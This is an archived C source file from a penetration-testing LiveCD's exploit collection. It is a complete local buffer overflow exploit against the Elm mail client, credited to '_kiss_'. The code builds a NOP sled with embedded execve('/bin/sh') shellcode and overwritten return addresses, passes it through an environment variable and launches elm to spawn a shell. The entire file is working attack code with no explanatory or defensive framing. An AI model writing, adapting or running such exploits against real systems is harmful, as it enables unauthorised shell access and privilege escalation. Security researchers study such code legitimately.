home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / Elm / elm-kiss.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  50 lines

---

1. /***
2.     -------------
3.     elm253-exploit.c
4.     -------------
5. ***/
6.  
7. #include <stdlib.h>
8.  
9. #define NOP 0x90
10. #define LEN 356
11. #define OFFSET 0
12. #define RET 0xbffffa64
13.  
14. unsigned long dame_sp() {
15.         __asm__("movl %esp,%eax");
16. }
17.  
18. void main() {
19.  
20.         static char shellcode[]=
21. /* "\x31\xc0"   */              /* xorl %eax,%eax        */
22. /* "\x31\xdb"   */              /* xorl %ebx,%ebx        */
23. /* "\xb0\x17"   */              /* movb $0x17,%al        */
24. /* "\xcd\x80"   */              /* int $0x80             */
25. "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
26. "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
27.  
28.         int i=0;
29.         int cont=0;
30.         char buffer[LEN+4];
31.         char kid[6+LEN+4];
32.  
33.         printf("-------------------------------------\n");
34.         printf("elm buffer overflow exploit by _kiss_\n");
35.         printf("-------------------------------------\n");
36.  
37.         for (i=0;i<=LEN;i+=4)
38.                 *(long *) &buffer[i] = RET;
39.  
40.         for (i=0;i<LEN-strlen(shellcode)-100;i++)
41.                 buffer[i]=NOP;
42.  
43.         for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
44.                 buffer[i]=shellcode[cont++];
45.  
46.         strcpy(kid,"KID=");
47.         strcat(kid,buffer);
48.         putenv(kid);
49.         system("/usr/local/bin/elm -f $KID");
50. }